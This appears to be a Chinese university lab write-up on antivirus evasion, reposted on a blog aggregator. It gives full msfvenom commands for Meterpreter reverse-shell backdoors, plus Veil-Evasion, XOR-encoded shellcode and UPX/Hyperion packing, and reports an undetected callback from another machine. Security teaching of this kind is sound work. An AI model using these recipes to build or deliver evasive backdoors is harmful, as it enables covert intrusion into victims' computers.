博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20165310 NetSec2019 Week5 Exp3 免杀原理与实践
阅读量:4987 次
发布时间:2019-06-12

本文共 3491 字,大约阅读时间需要 11 分钟。

20165310 NetSec2019 Week5 Exp3 免杀原理与实践

一、免杀原理

  • 杀软是如何检测出恶意代码的

    • 基于特征码的检测:特征码就是一段恶意程序有但是正常程序没有的一段代码,当杀软检测到一个程序里有和特征码库中匹配的特征码,就会将它作为恶意程序处理。
    • 启发式恶意软件检测:杀软根据程序的片面特征去推断其是否包含恶意代码,通常缺乏精确判定依据。
    • 基于行为的恶意软件检测:是加入了行为监控的启发式检测,更加精确。当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,例如修改注册表等,则会把它当成恶意软件。
  • 免杀是做什么?

    • 对恶意软件进行不影响它功能的各种方法操作,如编码、加壳等处理,使他的特征码改变,或是捆绑正常应用等,逃过杀毒软件的扫描
  • 免杀的基本方法有哪些?

    • 改变特征码 :如加壳、用encode对shellcode进行编码、利用shellcode生成可执行文件、用python和C等其他语言重写再编译。
    • 第二种是改变行为:如在通讯中尽量使用反弹式连接、使用隧道技术、加密通讯数据等等,在操作中基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码等。
    • 第三种是非常规方法:如使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中;使用社工类攻击,诱骗目标关闭AV软件;纯手工打造一个恶意软件等等。

二、实验内容

  • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程
  • 通过组合应用各种技术实现恶意代码免杀
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

任务一、使用msf编码器msfvenom生成后门程序

  • 使用msf命令生成后门程序:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.154.151 LPORT=5310 -f exe > msf-CEncod1.exe

    • 其中,-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符

    0

    • 在virscan与VirusTotal中扫描结果分别如下:

    1

    2

    可以看出来查出率有一半多,免杀效果很差

  • 尝试利用msf的多次编码参数-i来进行多次编码,提高免杀效果:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.154.151 LPORT=5310 -f exe > msf-CEncod2.exe

    3

    • 免杀扫描结果如下:

    4

    5

    ​ 可以发现甚至扫描几乎不变,甚至反而变多了,效果并不好。

  • 尝试生成别的类型的文件进行免杀操作

    • 生成jar类型的后门:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.154.151 LPORT=5310 x> msf_JarEncode.jar

      6

    • 扫描结果如下:

      7

      8

      在virscan中结果明显比exe文件减少很多,但是在VirusTotal中差不多

任务二、使用veil-evasion生成后门程序及检测

  • Veil-Evasion的安装

    • 安装veil-evasion:apt-get install evil-evation

    -

    • 过程中需安装一系列依赖例如wine等,安装成功后可以看到如下界面:

    -

  • 利用Veil生成C语言免杀后门:

    • 命令use evasion进入evil-evasion,命令list可以查看能编写哪些种类的后门

    9

    • 我们选择C语言的tcp反连接后门:use 7(7为list中的对应序号)

    006tKfTcly1g1lzwpzgfdj30m40bxjt0.jpg

    • 进行参数设置:

    006tKfTcly1g1lzwp1ujyj30lv0b2myp.jpg

    • 生成免杀后门软件成功,命名为veil_CEncode.exe

    006tKfTcly1g1lzwpj5m3j30lu0b2mzs.jpg

    • 进行扫描查看免杀效果

    006tKfTcly1g1lzwqg2wkj30lt050dga.jpg

    006tKfTcly1g1lzwnag36j30di045glu.jpg

    ​ 可以看出免杀效果没有明显提高,对比去年学长学姐的博客,效果明显变差,推测应该是病毒库更新的原因。

任务三、半手工注入Shellcode并执行

  • 本机实验

    • 利用msf生成一段C语言的shellcode:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.151 LPORT=5310 -f c

    006tKfTcly1g1lzwnt7u5j30sq0f97ab.jpg

  • 进行了C语言的异或编码,试图让他逃脱杀软的扫描,验证编码是否正确:

    006tKfTcly1g1lzwomw1mj30r90b5aeq.jpg

    • 例行扫描:

    006tKfTcly1g1m125yb76j30u10izn0y.jpg

    006tKfTcly1g1m127lmf4j30dn0470sz.jpg

    ​ 效果比上面的工具似乎好一点,但没有明显改善,简单的异或编码已经骗不过杀软了,下回尝试加密,如果成功再更新。

    • 尝试回连,查看是否经过异或加密的shellcode还能正常工作,没有优先尝试加密的原因正是因为加密后再解密的shellcode容易失效

    006tKfTcly1g1m129nqlaj30jp0cagoj.jpg

    006tKfTcly1g1m126p9e5j30hw052t9s.jpg

  • 另外的真机回连

    • IP改变,重新生成shellcode:

      006tKfTcly1g1m4ccneljj30n30dn0xo.jpg

    • 生成可执行文件,发送给对方执行并回连,exploit等待:

      006tKfTcly1g1m4cdialoj30k307w0us.jpg

    • 对方执行文件,回连成功:

      CA460D5410E976E7803752F4FA332E

    • 执行命令dir确认连接成功:

      41636E345393A7896CFD97B4DA3D89

    • 腾讯安全管家扫描没有扫出

      35E1E87F6D6CA88582E25FDE4F313B

任务四、加壳

  • 对上面第一个半手工shellcode进行UPX加壳,减少文件体积 :

    • 对半手工生成的shellcode加upx壳

      006tKfTcly1g1m126p9e5j30hw052t9s.jpg

    • 扫描结果:

      006tKfTcly1g1m12ayhvvj30cs03haa9.jpg

      006tKfTcly1g1m128k4z3j30mg05cdg9.jpg

      查出来的杀软数目反而增多,应该是upx的特征码被录入了病毒库,下面再加一层加密壳验证一下自己的看法

    • 利用wine模拟Windows环境,运行hyperion.exe进行加壳

      006tKfTcly1g1m124mbzbj30k20alwgq.jpg

    • 进行扫描:006tKfTcly1g1m12ak81pj30mv05rjru.jpg

      006tKfTcly1g1m12bzhryj30cu03bmxb.jpg

      ​ 被扫描出的结果更多,可以验证上面的想法,著名加壳工具只会增加被发现概率,建议自己加花指令或者改壳。

任务五、听说pathon-evasion挺好用

  • 为了能够嵌入汇编语言,选择了C语言对shellcode进行处理,加密解密没有现成的库简直要了命= =,于是贼心不死还是想找个工具,于是安装了听说很好用的pathon-evasion,但是不得不说安装和evil-evasion一样麻烦。

    • 经过一系列复杂的异或与多线程等操作之后,生成了exe送去扫描:

      006tKfTcly1g1m128bcnaj30xa0i20w4.jpg

      可以看见结果稍有好转,但是没有理想中那么好,查看扫描结果发现,pathon本身特征码已经被杀软锁定了,甚至不需要扫描文件本身,直接可以断定是恶意代码,大概是曾经太好用了,可见很多杀毒软件更新还是可靠并且快的。

    • 但是还是有优点的,之前生成的所有恶意软件没有能够逃过火绒的扫描,但是这款生成的软件成功没有被发现(*_phan.exe文件都没有被扫出)

      006tKfTcly1g1m4cbb2gtj30hp06hdgw.jpg

      006tKfTcly1g1m12bhkg1j30m50e9tag.jpg

      总的来说,国内主流杀软病毒库,就本次扫描结果来说360>火绒>腾讯,但个人使用感火绒>360=腾讯,所以最后还是选择了火绒,希望它病毒库能更新的快一点吧。

三、遇到问题与实验感想

1、遇到的问题:

  • Veil-Evasion安装失败

    • 建议先执行apt-get upgrade操作,进行后成功率高了很多
    • 事实上即便更新后,安装仍然中断许多次,那就多试几次吧
    • 如果报错但是还是完成了安装,不妨试着运行一下,我最终安装有报错但是能正常运行,估计原因是前几次虽然安装失败但有些配置已经配置好了,正好是最后一次失败的配置。

    -

  • ping不通别人的真机

    • 虚拟机网络设置改为桥接模式
    • 对方关闭防火墙

    006tKfTcly1g1m4cev2tvj30l10ammzt.jpg

  • 回连不成功

    • 尝试了n次生成不同的shellcode,再编译成可执行文件
    • 查看进程和端口都没问题
    • 突然就成功了大概是个玄学,多试几次吧,加油,感觉验收又会死在这个上面很久,god bless me。

2、实验收获与感想

  • 本次试验扫描出来最少的样品其实是veil生成的一个python的回连脚本,但是由于我没有使用py2exe,并不能确定生成exe可执行文件后是否不会被扫描,但是根据msf生成的Java的扫描结果,似乎都比c语言要具有一定的优势。-

    006tKfTcly1g1m1dnos7nj30ip03nglw.jpg

  • 简陋的半手动shellcode生成可执行文件依然比过于大众的免杀工具好用,例如:加upx的壳与veil的C语言后门,以及msf生成的源码。

  • 可以大胆猜测一下,如果要做到真正的免杀,半手动的py/jar进行处理+部分小众工具会有奇效,要是能自己生成shellcode或许更好,总而言之就是要改变特征码与哈希值。

  • 如果要避免动态监测,绑定正常程序或者以正常程序为模板或者生成恶意dll调用,会比单独的恶意软件好很多。

  • 虽然火绒病毒库不够新,依然不能阻止我爱他的使用感。

  • 很多想法想验证,但是我来不及了,时间太少了,枯了。

转载于:https://www.cnblogs.com/atbaoi/p/10632314.html

你可能感兴趣的文章
VC编程操作Excel
查看>>
【分享】如何设计更加“面向对象”的三层架构系统(1)
查看>>
实验五总结
查看>>
C++回调函数
查看>>
Phpstorm-Xdebug配置
查看>>
C#总结项目《影院售票系统》编写总结三
查看>>
Linux中命令行编译java接口总是提示找不到符号的疑难杂症的解决
查看>>
WF中创建持久化服务和跟踪服务数据库
查看>>
微软企业库5.0系统(一):使用缓存 Microsoft.Practices.EnterpriseLibrary.Caching(初级篇)...
查看>>
5.29
查看>>
String分析
查看>>
MySQL学习——SQL查询语句(连接查询&子查询)(三)
查看>>
oracle pl sql 行转列 (数据翻转实现)
查看>>
优秀的项目经理需要具备哪些品质?
查看>>
Avi视频生成缩略图时,提示“尝试读取或写入受保护的内存。这通常指示其他内存已损坏”...
查看>>
命令行执行python模块时提示ImportError: No module named xxx
查看>>
WPF界面假死
查看>>
asp.net mvc 2.o 中使用JQuery.uploadify
查看>>
C#学习笔记2
查看>>
Java 面向对象 之 super 关键字
查看>>